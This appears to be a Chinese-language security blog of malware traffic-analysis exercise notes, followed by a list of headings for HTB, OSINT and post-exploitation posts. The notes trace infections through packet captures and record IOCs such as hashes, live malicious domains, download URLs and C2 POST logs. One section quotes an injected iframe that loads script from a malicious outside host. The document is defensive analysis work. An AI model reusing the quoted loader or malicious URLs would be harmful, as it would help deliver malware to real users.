  4228 2020-06-13 01:17:09.848132 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49743 (49743) 713 Intel_6d:fc:e2 Cisco_29:41:7d
  4237 2020-06-13 01:17:10.374922 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49744 (49744) 749 Intel_6d:fc:e2 Cisco_29:41:7d
  4632 2020-06-13 01:17:12.291210 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49747 (49747) 646 Intel_6d:fc:e2 Cisco_29:41:7d
  4633 2020-06-13 01:17:12.291276 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49746 (49746) 584 Intel_6d:fc:e2 Cisco_29:41:7d
  4638 2020-06-13 01:17:12.291811 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49748 (49748) 579 Intel_6d:fc:e2 Cisco_29:41:7d
  4645 2020-06-13 01:17:12.293078 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49749 (49749) 705 Intel_6d:fc:e2 Cisco_29:41:7d
  4650 2020-06-13 01:17:12.296081 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49745 (49745) 649 Intel_6d:fc:e2 Cisco_29:41:7d
  4813 2020-06-13 01:17:13.261739 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49750 (49750) 638 Intel_6d:fc:e2 Cisco_29:41:7d
  5330 2020-06-13 01:17:13.575334 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49751 (49751) 585 Intel_6d:fc:e2 Cisco_29:41:7d
  5776 2020-06-13 01:17:14.014885 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49752 (49752) 668 Intel_6d:fc:e2 Cisco_29:41:7d
  8359 2020-06-13 01:17:15.790515 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49753 (49753) 816 Intel_6d:fc:e2 Cisco_29:41:7d
  8539 2020-06-13 01:17:17.284101 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49754 (49754) 890 Intel_6d:fc:e2 Cisco_29:41:7d
  8550 2020-06-13 01:17:18.846653 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49755 (49755) 798 Intel_6d:fc:e2 Cisco_29:41:7d
  8562 2020-06-13 01:17:20.377579 10.6.12.203 5.101.51.151 HTTP snnmnkxdhflwgthqismb.com POST /post.php HTTP/1.1 http (80) 49756 (49756) 918 Intel_6d:fc:e2 Cisco_29:41:7d

知识

参考

FRANK-N-TED (WHAT’S GOING ON?) - Traffic Analysis Train

DATA DUMP FROM ASTAROTH (GUILDMA) MALWARE INFECTION

2024-04-13T04:57:12.000Z

2024-04-05 (THURSDAY): DATA DUMP FROM ASTAROTH (GUILDMA) MALWARE INFECTION

学习记录

HTTP流

首先查看HTTP流，并追踪第一条流

返回的HTML代码的作用是在当前页面中嵌入了一个 iframe元素，该 iframe加载了指定的 URL。该 URL 中的参数 searchString 包含了一些JavaScript代码，其中引入了 jQuery库，并加载了另一个JavaScript 文件

1
2
3

<body style="margin:0;padding:0;">
    <iframe style="position:relative; top: -104px; left: -141px;width:10;height:10" allowtransparency="true" src="https://biosuperdeal.be/index.php?searchString=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://eeiufr.neoburst.company/74262421815720Z1iFaTEnQ76IoEzkmhPMkFUzvGd2Vk4o2934293112/Imprimir_DACTEs_73262593.doa_..%22%3E">
body>

追踪第二条HTTP流，发现其响应了一个JS代码

这个JS代码的变量名和函数名看起来都是随机生成的

使用了WScript.Shell对象，这通常用于执行系统命令

KUGvzmueVhJnAlPYGL函数用于生成一个值，根据值的不同ykCZgNvJcLaKRUUaoTjd被赋予不同的地址

后面似乎还运行了CMD命令，看起来似乎是恶意代码

将下面流的域名e9h47j3aey4.findbusca.store在上一条流中的地址中查找，发现存在。可能的情况是用户访问了http://eeiufr.neoburst.company/74262421815720Z1iFaTEnQ76IoEzkmhPMkFUzvGd2Vk4o2934293112/Imprimir_DACTEs_73262593.do然后JS代码执行，随后访问了http://e9h47j3aey4.findbusca.store/?77226593077628733

追踪这条流，首先请求服务器返回http://e9h47j3aey4.findbusca.store/?77226593077628733的HTTP标头信息，发现其是.zip文件

同样方法查看，发现其返回了几个.zip文件，分别为gltGlAzqRU.zip、CoAaOeqlDZ.zip、xIARkijOeZ.zip、AyxnzbzCdp.zip，下载后分析（注意：请勿在个人电脑上下载，请在虚拟机内分析）

第一个是一个可执行文件，通过查询其sha256值，发现其为恶意软件

后面这三个不知道是什么东西，剩下的就没什么思路了（有其他的想法请twitter）

(以下未完成)

线索梳理

Environment（调查的资产信息/环境）
- LAN segment range
- Domain
- Domain controller
- LAN segment gateway
- LAN segment broadcast address
Incident Report
- Executive summary（感染过程总结）
- Victim details（受害者细节）
  - IP address
  - MAC address
  - User account name
- Indicators of compromise (IOCs)
  - SHA256 hash
  - File size
  - File name
  - File location
  - File description：
- HTTP traffic to retrieve the malware
  - 即下载恶意文件的HTTP流量记录
- HTTP traffic for remote request infection activity
  - 即感染相关的远程请求活动的HTTP流量记录
- INVESTIGATION（调查过程）
  - 最后可以给一个精简的流程图

知识

参考

DATA DUMP FROM LATRODECTUS INFECTION

2024-04-12T02:41:48.000Z

2024-04-09 (TUESDAY): DATA DUMP FROM LATRODECTUS INFECTION

学习记录

HTTP流

通过命令http.response.code==200查看返回成功的http流量，并逐一追踪

这个交互看起来像是进行了一个 OCSP（在线证书状态协议）查询。在此查询中，客户端请求某个证书的状态，而服务器（ocsp.digicert.com）则返回了该证书的状态信息（即 OCSP 响应）

第二条流请求了证书

第三条流是一个 OPTIONS 请求，用于查询服务器支持的方法。87.249.49.206服务器返回了状态码 200 OK，表示请求成功，并在响应头部中列出了服务器支持的方法，包括 OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK

第四条流是一个 OPTIONS 请求，用于查询87.249.49.206服务器对 /share 资源支持的方法。服务器返回了状态码 200 OK，表示请求成功，并在响应头部中列出了服务器支持的方法，包括 OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK

第五条流，请求服务器/share/esetond.msi，服务器返回了一个.msi文件

查询域名发现其可能为恶意地址

将.msi文件的sha256值在virustotal中查询，发现其为恶意软件

.MSI文件分析

一些恶意代码可能嵌入到.msi文件中，故通过Orca对.MSI文件进行分析，分析方法参考（注意：请勿在个人电脑上分析，请在虚拟机内分析）

其二进制表如下，其中包括exe、jpg、dll以及其他格式的二进制文件

其文件表只包含一个Util.dll文件

组件表是具有用于指定将.cab中存在的文件安装到哪里的功能表

控制表（我猜是用于程序的控制，比如PushButton）

CustomAction Table 参考里面说是最重要的表格。（不知道都运行了什么0.0）多数Action运行了aicustact.dll

使用 msi 的注册表功能在注册表键 Software\[Manufacturer]\[ProductName]中注册值

没有发现任何线索，可能我的分析方法有问题，如果有任何建议请访问我的twitter，联系我。

利用foremost对msi文件进行分离

查看exe文件的sha256值，并通过virustotal查询，发现其为AIDetectMalware，

dll文件未发现问题

加密流

在获取.msi文件之前，受害主机和87.249.49.206进行了一段时间的加密通信

问题

并没有发现题目里提供的文件（大失败 T T，如果你发现了请联系我twitter）

线索梳理

Environment（调查的资产信息/环境）
- LAN segment range:10.4.9.0/24
- Domain:-
- Domain controller:10.4.9.1
- LAN segment gateway:10.4.9.1
- LAN segment broadcast address:10.4.9.255
Incident Report
- Executive summary:
  用户被嵌入恶意软件的.msi文件感染
- Victim details
  - IP address:10.4.9.101
  - MAC address:00:26:c7:2f:c6:7e
  - User account name:-
- Indicators of compromise (IOCs)
  - SHA256 hash:08075e8a6dcc6a5fca089348edbd5fc07b2b0b26a26a46e0dd401121fdaa88d3
  - File size:1,649,664 字节
  - File name:esetnod.msi
  - File location:http://kosukeshimura.com/share/esetnod.msi
  - File description:被恶意软件嵌入的.msi文件
- HTTP traffic to retrieve the malware
  - 5663 2024-04-10 07:44:29.351877 10.4.9.101 87.249.49.206 HTTP kosukeshimura.com GET /share/esetnod.msi HTTP/1.1 http (80) 50367 (50367) 246 Intel_2f:c6:7e Cisco_30:22:43

知识

参考

TRAFFIC ANALYSIS EXERCISE - TECSOLUTIONS

2024-04-11T06:36:47.000Z

2020-07-31 - TRAFFIC ANALYSIS EXERCISE - TECSOLUTIONS

学习记录

HTTP流

首先过滤HTTP流并追踪

发现域名e-dsm.com.br返回了一个doc文件

域名jambino.us返回了一个exe可执行文件

随后不断的向201.235.10.215 IP地址POST数据

将doc文件和exe文件导出（注意：请勿在个人电脑上导出，请在虚拟机内导出）

使用binwalk对doc文件进行分析

使用foremost将文件导出，发现有一个ole文件夹和一个zip文件夹，zip文件内为xml文件

计算.ole文件的MD5值，并在virustotal内查询，发现其为木马下载器，那么后续exe文件则为可执行木马程序

计算exe文件的MD5值，并在virustotal内查询，确定其为木马程序

C2流量

下载木马程序之后，主机10.7.31.101与主机为201.235.10.215、104.236.52.89:8080交互频繁

加密流

无可疑地址

其他流

10.7.31.101发出NBNS注册请求到 NBNS 服务器，其计算机名为DESKTOP-DPHW305<20> (Server service)

通过过滤条件kerberos.CNameString来查找账户名称

Kerberos 是一个网络身份验证协议，用于在不安全的网络中安全地验证用户和服务之间的身份。
以下是 Kerberos 协议的工作原理：
认证服务器（AS）：用户向 Kerberos 认证服务器请求访问服务。AS 验证用户的身份，并生成用于与 Ticket Granting Server (TGS) 通信的 Ticket-Granting Ticket (TGT)。TGT 是受加密保护的，只有 TGS 可以解密它。
票证授予服务器（TGS）：用户收到 TGT 后，可以使用它向 TGS 请求访问特定的服务。用户向 TGS 提交 TGT 和服务标识符的请求。TGS 验证用户的 TGT，并生成一个用于访问特定服务的服务票证（Service Ticket）。服务票证也是受加密保护的。
服务请求：用户收到服务票证后，可以将它与服务请求一起发送给服务。服务收到请求后，使用它和自己的密钥解密服务票证。如果票证有效且未被篡改，服务将向用户提供所需的服务。

线索梳理

Environment（调查的资产信息/环境）
- LAN segment range:10.07.31.0/24
- Domain:tecsolutions.info
- Domain controller:10.07.31.7
- LAN segment gateway:10.07.31.1
- LAN segment broadcast address:10.07.31.255
Incident Report
- Executive summary:
  用户gregory.simmons被木马感染
- Victim details（受害者细节）
  - IP address: 10.7.31.101
  - MAC address: 00:0c:6e:12:af:38
  - User account name: gregory.simmons
- Indicators of compromise (IOCs)
  - SHA256 hash:0a3aaa398a6abe7a4ba256812b8b6632fa4595b4ac5c47b459d5a6a911c2d202
  - File size:913,503 字节
  - File name:3tknamb7298632293.exe
  - File location:http://jambino.us/tv/DYsPb/
  - File description:可执行文件
- HTTP traffic to retrieve the malware
  - 191 2020-07-31 08:25:37.088661 10.7.31.101 191.6.208.51 HTTP e-dsm.com.br GET /www/ZdJCAB/ HTTP/1.1 http (80) 49737 (49737) 488 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 531 2020-07-31 08:26:19.877245 10.7.31.101 67.20.112.81 HTTP jambino.us GET /tv/DYsPb/ HTTP/1.1 http (80) 49751 (49751) 123 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
- HTTP traffic for remote request infection activity
  - 1493 2020-07-31 08:26:34.733614 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /RLVIcVHpdWjKMHfJsK/bhAzHJy/vazwovI5B9BcchWQ/d0EvU2Xl/HQ7AQetdQggMrPULmis/ HTTP/1.1 http (80) 49815 (49815) 414 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 1649 2020-07-31 08:26:56.312136 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /M7aBEffyXE/Upa44JYc0iD8C5Co5qj/QxcEX6A0fDBvDo/ HTTP/1.1 http (80) 49815 (49815) 414 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 1675 2020-07-31 08:26:57.327828 10.7.31.101 104.236.52.89 HTTP 104.236.52.89:8080 POST /y1Oc/CRTtjoStAe/03wHuC/ HTTP/1.1 http-alt (8080) 49817 (49817) 570 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 1842 2020-07-31 08:27:13.551157 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /2lOJG5Lepy9SF/6rmms2u4C61LmFD/hJubcUz/13vVTTA5/kRmZYIUJ67VF1I/GyiwnO6oOQatOesN4K/ HTTP/1.1 http (80) 49815 (49815) 414 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 1881 2020-07-31 08:27:19.007452 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /qKSwAKe1Mi/y5QsEBixxmL45MPHwaD/smvp/78W7iuovnPDTvP2w/10jxRo2zF6M/ HTTP/1.1 http (80) 49815 (49815) 414 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 2003 2020-07-31 08:27:29.328238 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /o9O08G04DzIZG8OWRp/ HTTP/1.1 http (80) 49815 (49815) 414 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 2543 2020-07-31 08:28:12.784950 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /LCWZY47XwmugeO3/3z2TvDhczd/ HTTP/1.1 http (80) 49815 (49815) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 2558 2020-07-31 08:28:12.975985 10.7.31.101 104.236.52.89 HTTP 104.236.52.89:8080 POST /rQDNZBxm3Rpz/YdX3soU3MRPD/fXFnwkKVcXuwwBkpsSq/ HTTP/1.1 http-alt (8080) 49825 (49825) 350 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 2685 2020-07-31 08:28:28.385792 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /aNIce30YT/xzZyFctinQ3Jkn/ HTTP/1.1 http (80) 49815 (49815) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 2697 2020-07-31 08:28:28.655094 10.7.31.101 104.236.52.89 HTTP 104.236.52.89:8080 POST /RaGu/PUTIkmMWtxHtctq/du2EPQGClXV/ HTTP/1.1 http-alt (8080) 49826 (49826) 1490 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 3260 2020-07-31 08:29:21.910776 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /4DsE/ HTTP/1.1 http (80) 49815 (49815) 382 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 3861 2020-07-31 08:43:48.725324 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /NemVGY4zT/f6eDx8v6CbHNUXS/gjuMfPtC/j2SXoNwzJzR/ HTTP/1.1 http (80) 49985 (49985) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 4037 2020-07-31 08:44:31.428936 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /yguqyvZp1YxK083S/H5kIaZFW692xUc/HLuonj6146/ HTTP/1.1 http (80) 49985 (49985) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 4064 2020-07-31 08:44:36.331335 10.7.31.101 104.236.52.89 HTTP 104.236.52.89:8080 POST /xian/balloon/ HTTP/1.1 (application/x-www-form-urlencoded) http-alt (8080) 49987 (49987) 722 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 4178 2020-07-31 08:59:10.832559 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /VmjfI/jygtnUpXR/kxLUe7h097jcjEAJPIM/u8O5/jHD8f/NiJ7CP0jmzegr/ HTTP/1.1 http (80) 49989 (49989) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 4414 2020-07-31 08:59:26.656364 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /FlpErlAFJoc1f77w3J/ HTTP/1.1 http (80) 49989 (49989) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
  - 4574 2020-07-31 09:13:59.964790 10.7.31.101 201.235.10.215 HTTP 201.235.10.215 POST /RoEy0QXUh0/ HTTP/1.1 http (80) 49999 (49999) 366 ASUSTekCOMPU_12:af:38 Cisco_79:48:c2
- INVESTIGATION
  - 首先检查http传输的exe可执行文件
  - 发现C2流量

知识

DCERPC

DCERPC（Distributed Computing Environment Remote Procedure Calls）是一种远程过程调用（RPC）协议，用于在分布式计算环境中进行通信。它最初是由OSF（Open Software Foundation）开发的，后来成为了 DCE（Distributed Computing Environment）标准的一部分。

DRSUAPI

DRSUAPI（Directory Replication Service Remote Administration Interface）是用于管理 Windows 活动目录（Active Directory）复制服务的远程管理接口。它提供了一组用于管理和监视活动目录复制的远程过程调用（RPC）接口。

LLMNR

LLMNR 是 Link-Local Multicast Name Resolution 的缩写，是一种用于在局域网中进行主机名解析的协议。它通常用于 Windows 系统中，并且是 Windows Vista 及更高版本中的默认网络服务之一。

LDAP

LDAP 是 Lightweight Directory Access Protocol 的缩写，是一种用于访问和维护分布式目录服务的协议。它最初是由大学提供的工具和服务的联合开发团队（University of Michigan）开发的，并成为了互联网工程任务组（IETF）的标准协议。

参考

TECSOLUTIONS - Traffic Analysis Train

2020-07-31-traffic-analysis-exercise-answers.pdf

PCAP AND INFO FOR AN ISC DIARY

2024-04-11T01:25:09.000Z

2020-08-04 - PCAP AND INFO FOR AN ISC DIARY

学习记录

HTTP流

首先查看http流，并追踪第一条流

发现其传输的是一个可执行程序

查询请求的域名，发现其为恶意地址

导出该文件（注意：请勿在个人电脑中导出，请在虚拟机中导出）

该图片打不开

使用二进制分析攻击binwalk进行分析：

0x0: 这是一个Microsoft可执行文件，采用了可移植执行格式（PE）。
0x457F5: 这是一个bix头部，具有一些元数据信息，包括创建时间、数据地址、入口点等。其OS标记为4.4BSD，名称为”lXD”。
0x56639: 这也是一个bix头部，但这个文件看起来像是固件映像（Firmware Image）。
0x6F484: 这是一个Base64标准索引表。
0x73C70 和 0x73C9F: 这是HTML文档的头部和尾部。
0x74160 和 0x7418F: 这是另一个HTML文档的头部和尾部。
0xC3EE0 和 0xC3F09: 这是一个PNG图像和相应的Zlib压缩数据。

使用foremost分离该文件，得到exe文件和png图片

查看exe文件的md5值，并通过virustotal查询

加密流

无可疑流

线索梳理

恶意网站：aromaterapiaclinicabrasil.com.br
恶意文件：87411326.jpg
感染过程：受害者主机10.8.4.101 访问恶意网站aromaterapiaclinicabrasil.com.br后，下载图片形式的恶意文件87411326.jpg，该文件本质是一个exe文件，用excel的图标进行伪装，欺骗用户点击从而感染

知识

IGMPv3

IGMPv3（Internet Group Management Protocol version 3）是一种用于在IPv4网络中管理组成员关系的协议。它是IGMP协议的升级版本，主要用于在多播环境下管理主机和路由器之间的通信。

NBNS

NBNS（NetBIOS Name Service）是NetBIOS的一部分，用于在局域网中将NetBIOS名（通常是计算机名）解析为IP地址。NetBIOS是一种早期的局域网通信协议，用于在局域网中提供命名、会话和数据共享服务。

参考

Pcap and alerts for an ISC diary - Traffic Analysis Train

TRAFFIC ANALYSIS EXERCISE - PIZZA-BENDER

2024-04-10T12:15:14.000Z

2020-08-21 - TRAFFIC ANALYSIS EXERCISE - PIZZA-BENDER

学习记录

HTTP流

首先查看HTTP流

追踪第一条流，可以看到传输的是一个DLL可执行程序

通过virustotal查询访问域名ncznw6a.com，发现该域名存在恶意行为

随后请求域名ctldl.windowsupdate.com，IP为8.252.146.254，均返回304。

加密流

通过查看TLS流，发现除了知名的域名，存在其他域名
如

恶意软件

后续是否可以通过软件分析？

可疑地址

HOST	IP
ldrbravo.case	45.147.231.132
sieseetera.club	89.44.9.186
ciliabba.cyou	89.44.9.186
ubbifeder.cyou	89.44.9.186

知识

LDAP协议

LDAP（轻量级目录访问协议，Lightweight Directory Access Protocol）是一种用于在网络上访问和维护目录服务的协议。目录服务是一种存储和组织信息的分层数据库，通常用于存储用户、组织、设备等信息，并提供快速和有效的检索功能。

KRB5

KRB5 是 Kerberos 5 的缩写，是一种用于网络身份验证的协议。Kerberos 是一种计算机网络身份验证协议，旨在提供强大的身份验证机制，确保只有合法用户能够访问网络资源。

SAMR

SAMR（Security Accounts Manager Remote Protocol）是一种用于远程管理 Windows 操作系统用户和组的协议。它允许远程客户端应用程序通过网络与 Windows 系统上的安全账户管理器（SAM）进行通信，从而实现对用户账户、组账户和域账户等的管理操作。

SMB2

SMB2（Server Message Block version 2）是一种用于在计算机网络上共享文件、打印机、串口及其他资源的协议。它是 SMB（Server Message Block）协议的更新版本，旨在提供更快、更安全和更可靠的文件共享服务。

参考

PIZZA-BENDER - Traffic Analysis Train

2in9ya2 Blog

Pwned-Exploiting HTB Planning

Planning

第一步用nmap进行扫描

提权

又学到了T_T

Pwned-Exploiting HTB Outbound

Outbound

第一步用nmap进行扫描

提权

又学到了T_T

Pwned-Exploiting HTB Puppy

Puppy

第一步用nmap进行扫描

提权

又学到了T_T

How to use HTB?

HTB

什么是HTB？

HTB VIP 和 HTB Academy VIP的区别

开始使用

注册

登录以及使用

后续

Pwned-Exploiting HTB Editor

Editor

第一步先上nmap进行扫描

第二步

提权

又学到了T_T

Pwned-Exploiting HTB Environment

Environment

第一步用nmap进行扫描

提权

又学到了T_T

Pwned-Exploiting HTB Era

Era

第一步用nmap进行扫描

提权

又学到了T_T

Finding Gozi - Unit 42 Wireshark Quiz, March 2023

Unit 42 Wireshark Quiz, March 2023

学习记录

请求流

ZIP文件分析

SMB流量分析

感染流量分析

知识

参考

Crossing the Line - Unit 42 Wireshark Quiz for RedLine Stealer

Unit 42 Wireshark Quiz for RedLine Stealer

学习记录

HTTP流

其他TCP

知识

参考

OSINT

OSINT

收集域名信息

网络爬虫

获取用户信息

Google Hacking 数据库

用户密码列表

自定义密码破解字典

CONTACT FORMS CAMPAIGN PUSHES SSLOAD MALWARE AS EARLY AS THURSDAY 2024-04-11

2024-04-15 (MONDAY): CONTACT FORMS CAMPAIGN PUSHES SSLOAD MALWARE AS EARLY AS THURSDAY 2024-04-11

学习记录

HTTP流

原作者分析记录

知识

参考

Post-exploitation attack

Privilege escalation

Post-exploitation attack

Information gathering

进程迁移

系统命令

文件系统命令

被加密的WIFI

2024-04-14 看雪CTF Misc 被加密的WIFI

`ZIP`文件分析

`SMB`流量分析